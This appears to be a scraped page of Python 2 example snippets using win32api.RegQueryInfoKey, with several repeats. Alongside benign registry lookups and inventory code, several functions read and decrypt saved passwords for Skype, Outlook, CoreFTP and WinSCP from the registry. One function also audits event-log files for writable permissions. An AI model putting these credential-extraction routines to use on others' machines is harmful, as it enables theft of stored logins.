def _GetServiceShortName(longName):
# looks up a services name
# from the display name
# Thanks to Andy McKay for this code.
access = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
hkey = win32api.RegOpenKey(win32con.HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services", 0, access)
num = win32api.RegQueryInfoKey(hkey)[0]
longName = longName.lower()
# loop through number of subkeys
for x in range(0, num):
# find service name, open subkey
svc = win32api.RegEnumKey(hkey, x)
skey = win32api.RegOpenKey(hkey, svc, 0, access)
try:
# find display name
thisName = str(win32api.RegQueryValueEx(skey, "DisplayName")[0])
if thisName.lower() == longName:
return svc
except win32api.error:
# in case there is no key called DisplayName
pass
return None
# Open a service given either it's long or short name.
python类RegQueryInfoKey()的实例源码
def _GetServiceShortName(longName):
# looks up a services name
# from the display name
# Thanks to Andy McKay for this code.
access = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
hkey = win32api.RegOpenKey(win32con.HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services", 0, access)
num = win32api.RegQueryInfoKey(hkey)[0]
longName = longName.lower()
# loop through number of subkeys
for x in range(0, num):
# find service name, open subkey
svc = win32api.RegEnumKey(hkey, x)
skey = win32api.RegOpenKey(hkey, svc, 0, access)
try:
# find display name
thisName = str(win32api.RegQueryValueEx(skey, "DisplayName")[0])
if thisName.lower() == longName:
return svc
except win32api.error:
# in case there is no key called DisplayName
pass
return None
# Open a service given either it's long or short name.
def get_regkey(self):
try:
accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
keyPath = 'Software\\Skype\\ProtectedStorage'
try:
hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead)
except Exception, e:
print e
return ''
num = win32api.RegQueryInfoKey(hkey)[1]
k = win32api.RegEnumValue(hkey, 0)
if k:
key = k[1]
return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]
except Exception, e:
print e
return 'failed'
# get hash from configuration file
def retrieve_info(self, hkey, name_key):
values = {}
num = win32api.RegQueryInfoKey(hkey)[1]
for x in range(0, num):
k = win32api.RegEnumValue(hkey, x)
if 'password' in k[0].lower():
try:
password = win32crypt.CryptUnprotectData(k[1][1:], None, None, None, 0)[1]
values[k[0]] = password.decode('utf16')
except Exception, e:
values[k[0]] = 'N/A'
else:
try:
values[k[0]] = str(k[1]).decode('utf16')
except:
values[k[0]] = str(k[1])
return values
def _GetServiceShortName(longName):
# looks up a services name
# from the display name
# Thanks to Andy McKay for this code.
access = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
hkey = win32api.RegOpenKey(win32con.HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services", 0, access)
num = win32api.RegQueryInfoKey(hkey)[0]
longName = longName.lower()
# loop through number of subkeys
for x in range(0, num):
# find service name, open subkey
svc = win32api.RegEnumKey(hkey, x)
skey = win32api.RegOpenKey(hkey, svc, 0, access)
try:
# find display name
thisName = str(win32api.RegQueryValueEx(skey, "DisplayName")[0])
if thisName.lower() == longName:
return svc
except win32api.error:
# in case there is no key called DisplayName
pass
return None
# Open a service given either it's long or short name.
def get_user_paths():
try:
keyh = win32api.RegOpenKeyEx(win32con.HKEY_USERS, None , 0, win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE | win32con.KEY_READ)
except:
return 0
paths = []
subkeys = win32api.RegEnumKeyEx(keyh)
for subkey in subkeys:
try:
subkeyh = win32api.RegOpenKeyEx(keyh, subkey[0] + "\\Environment" , 0, win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE | win32con.KEY_READ)
except:
pass
else:
subkey_count, value_count, mod_time = win32api.RegQueryInfoKey(subkeyh)
try:
path, type = win32api.RegQueryValueEx(subkeyh, "PATH")
paths.append((subkey[0], path))
except:
pass
return paths
def get_regkey(self):
try:
accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
keyPath = 'Software\\Skype\\ProtectedStorage'
try:
hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead)
except Exception, e:
# print e
return ''
num = win32api.RegQueryInfoKey(hkey)[1]
k = win32api.RegEnumValue(hkey, 0)
if k:
key = k[1]
return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]
except Exception, e:
# print e
return 'failed'
# get hash from configuration file
def retrieve_info(self, hkey, name_key):
values = {}
num = win32api.RegQueryInfoKey(hkey)[1]
for x in range(0, num):
k = win32api.RegEnumValue(hkey, x)
if 'password' in k[0].lower():
try:
password = win32crypt.CryptUnprotectData(k[1][1:], None, None, None, 0)[1]
values[k[0]] = password.decode('utf16')
except Exception, e:
values[k[0]] = 'N/A'
else:
try:
values[k[0]] = str(k[1]).decode('utf16')
except:
values[k[0]] = str(k[1])
return values
def getSoftwareList(self):
try:
hCounter=0
hAttCounter=0
# connecting to the base
hHandle = win32api.RegConnectRegistry(None,win32con.HKEY_LOCAL_MACHINE)
# getting the machine name and domain name
hCompName = win32api.GetComputerName()
hDomainName = win32api.GetDomainName()
# opening the sub key to get the list of Softwares installed
hHandle = win32api.RegOpenKeyEx(self.HKEY_LOCAL_MACHINE,self.CONST_SW_SUBKEY,0,win32con.KEY_ALL_ACCESS)
# get the total no. of sub keys
hNoOfSubNodes = win32api.RegQueryInfoKey(hHandle)
# delete the entire data and insert it again
#deleteMachineSW(hCompName,hDomainName)
# browsing each sub Key which can be Applications installed
while hCounter < hNoOfSubNodes[0]:
hAppName = win32api.RegEnumKey(hHandle,hCounter)
hPath = self.CONST_SW_SUBKEY + "\\" + hAppName
# initialising hAttCounter
hAttCounter = 0
hOpenApp = win32api.RegOpenKeyEx(self.HKEY_LOCAL_MACHINE,hPath,0,win32con.KEY_ALL_ACCESS)
# [1] will give the no. of attributes in this sub key
hKeyCount = win32api.RegQueryInfoKey(hOpenApp)
hMaxKeyCount = hKeyCount[1]
hSWName = ""
hSWVersion = ""
while hAttCounter < hMaxKeyCount:
hData = win32api.RegEnumValue(hOpenApp,hAttCounter)
if hData[0]== "DisplayName":
hSWName = hData[1]
self.preparefile("SW Name",hSWName)
elif hData[0]== "DisplayVersion":
hSWVersion = hData[1]
self.preparefile("SW Version",hSWVersion)
hAttCounter = hAttCounter + 1
#if (hSWName !=""):
#insertMachineSW(hCompName,hDomainName,hSWName,hSWVersion)
hCounter = hCounter + 1
except:
self.preparefile("Exception","In exception in getSoftwareList")
def IsExpandable(self):
# All keys are expandable, even if they currently have zero children.
return 1
## hkey = win32api.RegOpenKey(self.keyRoot, self.keyName)
## try:
## keys, vals, dt = win32api.RegQueryInfoKey(hkey)
## return (keys>0)
## finally:
## win32api.RegCloseKey(hkey)
def get_key_info(self):
accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
try:
key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\\FTPware\\CoreFTP\\Sites', 0, accessRead)
except Exception, e:
return False
num_profiles = win32api.RegQueryInfoKey(key)[0]
pwdFound = []
for n in range(num_profiles):
name_skey = win32api.RegEnumKey(key, n)
skey = win32api.RegOpenKey(key, name_skey, 0, accessRead)
num = win32api.RegQueryInfoKey(skey)[1]
values = {}
for nn in range(num):
k = win32api.RegEnumValue(skey, nn)
if k[0] == 'Host':
values['Host'] = k[1]
if k[0] == 'Port':
values['Port'] = k[1]
if k[0] == 'User':
values['User'] = k[1]
pwdFound.append(values)
if k[0] == 'PW':
try:
values['Password'] = self.decrypt(k[1])
except Exception, e:
values['Password'] = 'N/A'
# print the results
return pwdFound
def run(self):
accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
keyPath = 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook'
try:
hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead)
except Exception, e:
return
num = win32api.RegQueryInfoKey(hkey)[0]
pwdFound = []
for x in range(0, num):
name = win32api.RegEnumKey(hkey, x)
skey = win32api.RegOpenKey(hkey, name, 0, accessRead)
num_skey = win32api.RegQueryInfoKey(skey)[0]
if num_skey != 0:
for y in range(0, num_skey):
name_skey = win32api.RegEnumKey(skey, y)
sskey = win32api.RegOpenKey(skey, name_skey, 0, accessRead)
num_sskey = win32api.RegQueryInfoKey(sskey)[1]
for z in range(0, num_sskey):
k = win32api.RegEnumValue(sskey, z)
if 'password' in k[0].lower():
values = self.retrieve_info(sskey, name_skey)
# write credentials into a text file
if len(values) != 0:
pwdFound.append(values)
# print the results
return pwdFound
def IsExpandable(self):
# All keys are expandable, even if they currently have zero children.
return 1
## hkey = win32api.RegOpenKey(self.keyRoot, self.keyName)
## try:
## keys, vals, dt = win32api.RegQueryInfoKey(hkey)
## return (keys>0)
## finally:
## win32api.RegCloseKey(hkey)
def get_logins_info(self):
accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
try:
key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\Martin Prikryl\WinSCP 2\Sessions', 0,
accessRead)
except Exception, e:
return False
num_profiles = win32api.RegQueryInfoKey(key)[0]
pwdFound = []
for n in range(num_profiles):
name_skey = win32api.RegEnumKey(key, n)
skey = win32api.RegOpenKey(key, name_skey, 0, accessRead)
num = win32api.RegQueryInfoKey(skey)[1]
port = ''
values = {}
for nn in range(num):
k = win32api.RegEnumValue(skey, nn)
if k[0] == 'HostName':
self.set_hostname(k[1])
if k[0] == 'UserName':
self.set_username(k[1])
if k[0] == 'Password':
self.set_hash(k[1])
if k[0] == 'PortNumber':
port = str(k[1])
if num != 0:
if port == '':
port = '22'
try:
password = self.decrypt_password()
values['Password'] = password
except Exception, e:
pass
values['Hostname'] = self.get_hostname()
values['Port'] = port
values['Username'] = self.get_username()
pwdFound.append(values)
# print the results
return pwdFound
def get_key_info(self):
accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
try:
key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\\FTPware\\CoreFTP\\Sites', 0, accessRead)
except Exception, e:
return False
num_profiles = win32api.RegQueryInfoKey(key)[0]
pwdFound = []
for n in range(num_profiles):
name_skey = win32api.RegEnumKey(key, n)
skey = win32api.RegOpenKey(key, name_skey, 0, accessRead)
num = win32api.RegQueryInfoKey(skey)[1]
values = {}
for nn in range(num):
k = win32api.RegEnumValue(skey, nn)
if k[0] == 'Host':
values['Host'] = k[1]
if k[0] == 'Port':
values['Port'] = k[1]
if k[0] == 'User':
values['User'] = k[1]
pwdFound.append(values)
if k[0] == 'PW':
try:
values['Password'] = self.decrypt(k[1])
except Exception, e:
values['Password'] = 'N/A'
# print the results
return pwdFound
def run(self):
accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
keyPath = 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook'
try:
hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead)
except Exception, e:
return
num = win32api.RegQueryInfoKey(hkey)[0]
pwdFound = []
for x in range(0, num):
name = win32api.RegEnumKey(hkey, x)
skey = win32api.RegOpenKey(hkey, name, 0, accessRead)
num_skey = win32api.RegQueryInfoKey(skey)[0]
if num_skey != 0:
for y in range(0, num_skey):
name_skey = win32api.RegEnumKey(skey, y)
sskey = win32api.RegOpenKey(skey, name_skey, 0, accessRead)
num_sskey = win32api.RegQueryInfoKey(sskey)[1]
for z in range(0, num_sskey):
k = win32api.RegEnumValue(sskey, z)
if 'password' in k[0].lower():
values = self.retrieve_info(sskey, name_skey)
# write credentials into a text file
if len(values) != 0:
pwdFound.append(values)
# print the results
return pwdFound
def getSysInfo(self):
try:
hCounter=0
hProcessorName=""
# connecting to the base
hHandle = win32api.RegConnectRegistry(None,self.HKEY_LOCAL_MACHINE)
# opening the sub key to get the processor name
print "debug1"
hHandle = win32api.RegOpenKeyEx(self.HKEY_LOCAL_MACHINE,self.CONST_PROC_SUBKEY,0,win32con.KEY_ALL_ACCESS)
hNoOfKeys = win32api.RegQueryInfoKey(hHandle)[1]
while hCounter < hNoOfKeys:
hData = win32api.RegEnumValue(hHandle,hCounter)
if hData[0]== "Identifier":
hProcessorName = hData[1]
hCounter = hCounter + 1
if hProcessorName=="":
hProcessorName = "Processor Name Cannot be determined"
self.preparefile("Processor Name",hProcessorName)
hCompName = win32api.GetComputerName()
self.preparefile("Computer Name",hCompName)
hDomainName = win32api.GetDomainName()
self.preparefile("Domain Name",hDomainName)
hUserName = win32api.GetUserName()
self.preparefile("User Name",hUserName)
# getting OS Details
hCounter=0
# opening the sub key to get the processor name
hHandle = win32api.RegOpenKeyEx(self.HKEY_LOCAL_MACHINE,self.CONST_OS_SUBKEY,0,win32con.KEY_ALL_ACCESS)
hNoOfKeys = win32api.RegQueryInfoKey(hHandle)[1]
hOSVersion=""
hOSName=""
while hCounter < hNoOfKeys:
hData = win32api.RegEnumValue(hHandle,hCounter)
if hData[0]== "ProductName":
hOSName = hData[1]
self.preparefile("OS Name",hOSName)
break
hCounter = hCounter + 1
if hOSName=="":
self.preparefile("OS Name","OS Name could not be read from the registry")
hCounter = 0
while hCounter < hNoOfKeys:
hData = win32api.RegEnumValue(hHandle,hCounter)
if hData[0]== "CSDVersion":
hOSVersion = hData[1]
self.preparefile("OS Version",hOSVersion)
break
hCounter = hCounter + 1
if hOSVersion=="":
self.preparefile("OS Version","OS Version could not be read from the registry")
# inserting master data
#insertMachineMaster(hCompName,hDomainName,hOSName,hOSVersion,hProcessorName)
except:
self.preparefile("Exception","in Exception in getSysDetails")
def get_logins_info(self):
accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
try:
key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\Martin Prikryl\WinSCP 2\Sessions', 0,
accessRead)
except Exception, e:
return False
num_profiles = win32api.RegQueryInfoKey(key)[0]
pwdFound = []
for n in range(num_profiles):
name_skey = win32api.RegEnumKey(key, n)
skey = win32api.RegOpenKey(key, name_skey, 0, accessRead)
num = win32api.RegQueryInfoKey(skey)[1]
port = ''
values = {}
for nn in range(num):
k = win32api.RegEnumValue(skey, nn)
if k[0] == 'HostName':
self.set_hostname(k[1])
if k[0] == 'UserName':
self.set_username(k[1])
if k[0] == 'Password':
self.set_hash(k[1])
if k[0] == 'PortNumber':
port = str(k[1])
if num != 0:
if port == '':
port = '22'
try:
password = self.decrypt_password()
values['Password'] = password
except Exception, e:
pass
values['Hostname'] = self.get_hostname()
values['Port'] = port
values['Username'] = self.get_username()
pwdFound.append(values)
# print the results
return pwdFound
def check_event_logs():
key_string = "HKEY_LOCAL_MACHINE\\" + eventlog_key_hklm
try:
keyh = win32api.RegOpenKeyEx(win32con.HKEY_LOCAL_MACHINE, eventlog_key_hklm , 0, win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE | win32con.KEY_READ)
except:
print "Can't open: " + key_string
return 0
subkeys = win32api.RegEnumKeyEx(keyh)
for subkey in subkeys:
# print key_string + "\\" + subkey[0]
sys.stdout.write(".")
try:
subkeyh = win32api.RegOpenKeyEx(keyh, subkey[0] , 0, win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE | win32con.KEY_READ)
except:
print "Can't open: " + key_string
else:
subkey_count, value_count, mod_time = win32api.RegQueryInfoKey(subkeyh)
# print "\tChild Nodes: %s subkeys, %s values" % (subkey_count, value_count)
try:
filename, type = win32api.RegQueryValueEx(subkeyh, "DisplayNameFile")
except:
pass
else:
weak_perms = check_weak_write_perms(os.path.expandvars(filename), 'file')
if weak_perms:
# print "------------------------------------------------"
# print "Weak permissions found on event log display DLL:"
# print_weak_perms("File", weak_perms)
sys.stdout.write("!")
save_issue("WPC008", "writable_eventlog_dll", weak_perms)
try:
filename, type = win32api.RegQueryValueEx(subkeyh, "File")
except:
pass
else:
weak_perms = check_weak_write_perms(os.path.expandvars(filename), 'file')
if weak_perms:
# print "------------------------------------------------"
# print "Weak permissions found on event log file:"
# print_weak_perms("File", weak_perms)
sys.stdout.write("!")
save_issue("WPC007", "writable_eventlog_file", weak_perms)
print
#sd = win32api.RegGetKeySecurity(subkeyh, win32security.DACL_SECURITY_INFORMATION) # TODO: get owner too?
#print "\tDACL: " + win32security.ConvertSecurityDescriptorToStringSecurityDescriptor(sd, win32security.SDDL_REVISION_1, win32security.DACL_SECURITY_INFORMATION)
